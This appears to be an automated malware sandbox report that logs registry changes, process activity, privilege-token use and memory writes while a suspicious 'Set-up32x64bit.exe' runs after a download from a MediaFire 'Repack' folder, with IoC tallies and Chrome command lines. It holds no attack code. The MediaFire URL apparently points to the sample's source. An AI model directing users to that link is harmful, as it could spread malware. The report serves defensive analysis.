Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.zipx	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.r10	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.r18	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.r22	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.r24\ = "WinRAR"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.r27	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.arj\ = "WinRAR"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.z	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.rar	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.txz\ = "WinRAR"	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.zipx\ = "WinRAR"	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}"	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.r07\ = "WinRAR"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.cab	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.lha\ = "WinRAR"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.rev	uninstall.exe
Key created	\REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.tbz2	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.r11	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.xz	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.tzst\ = "WinRAR"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA}	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.cab\ = "WinRAR"	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.tlz\ = "WinRAR"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.7z	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.001	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\ = "WinRAR archive"	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.r23\ = "WinRAR"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.tzst	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\DropHandler\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}"	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}"	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.r10\ = "WinRAR"	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.r13\ = "WinRAR"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.tlz	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.uue\ = "WinRAR"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.r16\ = "WinRAR"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.lha	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.xxe\ = "WinRAR"	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.uu\ = "WinRAR"	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.taz\ = "WinRAR"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.zip	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\InProcServer32	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.r00\ = "WinRAR"	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.r11\ = "WinRAR"	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.zst\ = "WinRAR"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shell\open	uninstall.exe
Key created	\REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	WinRAR.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.r21\ = "WinRAR"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.lzh	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\	uninstall.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1300	chrome.exe
1300	chrome.exe
5680	chrome.exe
5680	chrome.exe
6048	Set-up32x64bit.exe
6048	Set-up32x64bit.exe
2716	Set-up32x64bit.exe
2716	Set-up32x64bit.exe
2716	Set-up32x64bit.exe
2716	Set-up32x64bit.exe
2716	Set-up32x64bit.exe
2716	Set-up32x64bit.exe
2716	Set-up32x64bit.exe
2716	Set-up32x64bit.exe
6048	Set-up32x64bit.exe
6048	Set-up32x64bit.exe
6048	Set-up32x64bit.exe
6048	Set-up32x64bit.exe
4048	taskmgr.exe
4048	taskmgr.exe
6048	Set-up32x64bit.exe
6048	Set-up32x64bit.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
3244	Set-up32x64bit.exe
3244	Set-up32x64bit.exe
4048	taskmgr.exe
4048	taskmgr.exe
3244	Set-up32x64bit.exe
3244	Set-up32x64bit.exe
4048	taskmgr.exe
4048	taskmgr.exe
3244	Set-up32x64bit.exe
3244	Set-up32x64bit.exe
4048	taskmgr.exe
4048	taskmgr.exe
3244	Set-up32x64bit.exe
3244	Set-up32x64bit.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
3340	87511596656412869980.exe
3340	87511596656412869980.exe
5408	powershell.exe
5408	powershell.exe
4048	taskmgr.exe
3340	87511596656412869980.exe
3340	87511596656412869980.exe
3340	87511596656412869980.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
4048	taskmgr.exe
2888	OpenWith.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
672	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 43 IoCs

pid	Process
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1300	chrome.exe
Token: SeCreatePagefilePrivilege	1300	chrome.exe
Token: SeShutdownPrivilege	1300	chrome.exe
Token: SeCreatePagefilePrivilege	1300	chrome.exe
Token: SeShutdownPrivilege	1300	chrome.exe
Token: SeCreatePagefilePrivilege	1300	chrome.exe
Token: SeShutdownPrivilege	1300	chrome.exe
Token: SeCreatePagefilePrivilege	1300	chrome.exe
Token: SeShutdownPrivilege	1300	chrome.exe
Token: SeCreatePagefilePrivilege	1300	chrome.exe
Token: SeShutdownPrivilege	1300	chrome.exe
Token: SeCreatePagefilePrivilege	1300	chrome.exe
Token: SeShutdownPrivilege	1300	chrome.exe
Token: SeCreatePagefilePrivilege	1300	chrome.exe
Token: SeShutdownPrivilege	1300	chrome.exe
Token: SeCreatePagefilePrivilege	1300	chrome.exe
Token: SeShutdownPrivilege	1300	chrome.exe
Token: SeCreatePagefilePrivilege	1300	chrome.exe
Token: SeShutdownPrivilege	1300	chrome.exe
Token: SeCreatePagefilePrivilege	1300	chrome.exe
Token: SeShutdownPrivilege	1300	chrome.exe
Token: SeCreatePagefilePrivilege	1300	chrome.exe
Token: SeShutdownPrivilege	1300	chrome.exe
Token: SeCreatePagefilePrivilege	1300	chrome.exe
Token: SeShutdownPrivilege	1300	chrome.exe
Token: SeCreatePagefilePrivilege	1300	chrome.exe
Token: SeShutdownPrivilege	1300	chrome.exe
Token: SeCreatePagefilePrivilege	1300	chrome.exe
Token: SeShutdownPrivilege	1300	chrome.exe
Token: SeCreatePagefilePrivilege	1300	chrome.exe
Token: SeShutdownPrivilege	1300	chrome.exe
Token: SeCreatePagefilePrivilege	1300	chrome.exe
Token: SeShutdownPrivilege	1300	chrome.exe
Token: SeCreatePagefilePrivilege	1300	chrome.exe
Token: SeShutdownPrivilege	1300	chrome.exe
Token: SeCreatePagefilePrivilege	1300	chrome.exe
Token: SeShutdownPrivilege	1300	chrome.exe
Token: SeCreatePagefilePrivilege	1300	chrome.exe
Token: SeShutdownPrivilege	1300	chrome.exe
Token: SeCreatePagefilePrivilege	1300	chrome.exe
Token: SeShutdownPrivilege	1300	chrome.exe
Token: SeCreatePagefilePrivilege	1300	chrome.exe
Token: SeShutdownPrivilege	1300	chrome.exe
Token: SeCreatePagefilePrivilege	1300	chrome.exe
Token: SeShutdownPrivilege	1300	chrome.exe
Token: SeCreatePagefilePrivilege	1300	chrome.exe
Token: SeShutdownPrivilege	1300	chrome.exe
Token: SeCreatePagefilePrivilege	1300	chrome.exe
Token: SeShutdownPrivilege	1300	chrome.exe
Token: SeCreatePagefilePrivilege	1300	chrome.exe
Token: SeShutdownPrivilege	1300	chrome.exe
Token: SeCreatePagefilePrivilege	1300	chrome.exe
Token: SeShutdownPrivilege	1300	chrome.exe
Token: SeCreatePagefilePrivilege	1300	chrome.exe
Token: SeShutdownPrivilege	1300	chrome.exe
Token: SeCreatePagefilePrivilege	1300	chrome.exe
Token: SeShutdownPrivilege	1300	chrome.exe
Token: SeCreatePagefilePrivilege	1300	chrome.exe
Token: SeShutdownPrivilege	1300	chrome.exe
Token: SeCreatePagefilePrivilege	1300	chrome.exe
Token: SeShutdownPrivilege	1300	chrome.exe
Token: SeCreatePagefilePrivilege	1300	chrome.exe
Token: SeShutdownPrivilege	1300	chrome.exe
Token: SeCreatePagefilePrivilege	1300	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
1300	chrome.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe
4048	taskmgr.exe

Suspicious use of SetWindowsHookEx 15 IoCs

pid	Process
5420	OpenWith.exe
5140	OpenWith.exe
6132	OpenWith.exe
4036	OpenWith.exe
4036	OpenWith.exe
4036	OpenWith.exe
4036	OpenWith.exe
4036	OpenWith.exe
5796	winrar-x64-622.exe
5796	winrar-x64-622.exe
5796	winrar-x64-622.exe
3400	uninstall.exe
1604	OpenWith.exe
3116	OpenWith.exe
2888	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1300 wrote to memory of 2220	1300	chrome.exe	31
PID 1300 wrote to memory of 2220	1300	chrome.exe	31
PID 1300 wrote to memory of 4176	1300	chrome.exe	89
PID 1300 wrote to memory of 4176	1300	chrome.exe	89
PID 1300 wrote to memory of 4176	1300	chrome.exe	89
PID 1300 wrote to memory of 4176	1300	chrome.exe	89
PID 1300 wrote to memory of 4176	1300	chrome.exe	89
PID 1300 wrote to memory of 4176	1300	chrome.exe	89
PID 1300 wrote to memory of 4176	1300	chrome.exe	89
PID 1300 wrote to memory of 4176	1300	chrome.exe	89
PID 1300 wrote to memory of 4176	1300	chrome.exe	89
PID 1300 wrote to memory of 4176	1300	chrome.exe	89
PID 1300 wrote to memory of 4176	1300	chrome.exe	89
PID 1300 wrote to memory of 4176	1300	chrome.exe	89
PID 1300 wrote to memory of 4176	1300	chrome.exe	89
PID 1300 wrote to memory of 4176	1300	chrome.exe	89
PID 1300 wrote to memory of 4176	1300	chrome.exe	89
PID 1300 wrote to memory of 4176	1300	chrome.exe	89
PID 1300 wrote to memory of 4176	1300	chrome.exe	89
PID 1300 wrote to memory of 4176	1300	chrome.exe	89
PID 1300 wrote to memory of 4176	1300	chrome.exe	89
PID 1300 wrote to memory of 4176	1300	chrome.exe	89
PID 1300 wrote to memory of 4176	1300	chrome.exe	89
PID 1300 wrote to memory of 4176	1300	chrome.exe	89
PID 1300 wrote to memory of 4176	1300	chrome.exe	89
PID 1300 wrote to memory of 4176	1300	chrome.exe	89
PID 1300 wrote to memory of 4176	1300	chrome.exe	89
PID 1300 wrote to memory of 4176	1300	chrome.exe	89
PID 1300 wrote to memory of 4176	1300	chrome.exe	89
PID 1300 wrote to memory of 4176	1300	chrome.exe	89
PID 1300 wrote to memory of 4176	1300	chrome.exe	89
PID 1300 wrote to memory of 4176	1300	chrome.exe	89
PID 1300 wrote to memory of 4176	1300	chrome.exe	89
PID 1300 wrote to memory of 4176	1300	chrome.exe	89
PID 1300 wrote to memory of 4176	1300	chrome.exe	89
PID 1300 wrote to memory of 4176	1300	chrome.exe	89
PID 1300 wrote to memory of 4176	1300	chrome.exe	89
PID 1300 wrote to memory of 4176	1300	chrome.exe	89
PID 1300 wrote to memory of 4176	1300	chrome.exe	89
PID 1300 wrote to memory of 4176	1300	chrome.exe	89
PID 1300 wrote to memory of 3056	1300	chrome.exe	90
PID 1300 wrote to memory of 3056	1300	chrome.exe	90
PID 1300 wrote to memory of 4720	1300	chrome.exe	92
PID 1300 wrote to memory of 4720	1300	chrome.exe	92
PID 1300 wrote to memory of 4720	1300	chrome.exe	92
PID 1300 wrote to memory of 4720	1300	chrome.exe	92
PID 1300 wrote to memory of 4720	1300	chrome.exe	92
PID 1300 wrote to memory of 4720	1300	chrome.exe	92
PID 1300 wrote to memory of 4720	1300	chrome.exe	92
PID 1300 wrote to memory of 4720	1300	chrome.exe	92
PID 1300 wrote to memory of 4720	1300	chrome.exe	92
PID 1300 wrote to memory of 4720	1300	chrome.exe	92
PID 1300 wrote to memory of 4720	1300	chrome.exe	92
PID 1300 wrote to memory of 4720	1300	chrome.exe	92
PID 1300 wrote to memory of 4720	1300	chrome.exe	92
PID 1300 wrote to memory of 4720	1300	chrome.exe	92
PID 1300 wrote to memory of 4720	1300	chrome.exe	92
PID 1300 wrote to memory of 4720	1300	chrome.exe	92
PID 1300 wrote to memory of 4720	1300	chrome.exe	92
PID 1300 wrote to memory of 4720	1300	chrome.exe	92
PID 1300 wrote to memory of 4720	1300	chrome.exe	92
PID 1300 wrote to memory of 4720	1300	chrome.exe	92
PID 1300 wrote to memory of 4720	1300	chrome.exe	92
PID 1300 wrote to memory of 4720	1300	chrome.exe	92

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" "--simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT'" https://www.mediafire.com/folder/lsdjccfymbv0m/Repack
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1300
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0x58,0x108,0x7ffa1d109758,0x7ffa1d109768,0x7ffa1d109778
  2⤵
  PID:2220
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1780 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:2
  2⤵
  PID:4176
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:8
  2⤵
  PID:3056
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2932 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:3548
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2228 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:8
  2⤵
  PID:4720
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2940 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:2240
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=5012 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:1236
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5448 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:8
  2⤵
  PID:3964
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4528 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:8
  2⤵
  PID:4844
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5644 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:8
  2⤵
  PID:4128
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5080 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:1108
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5492 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:3868
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5144 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:4312
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3100 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:4552
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=5836 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:924
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=6320 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:780
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=6184 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:5020
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=6456 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:644
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=6628 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:2404
- C:\Program Files\Google\Chrome\Application\chrome.exe
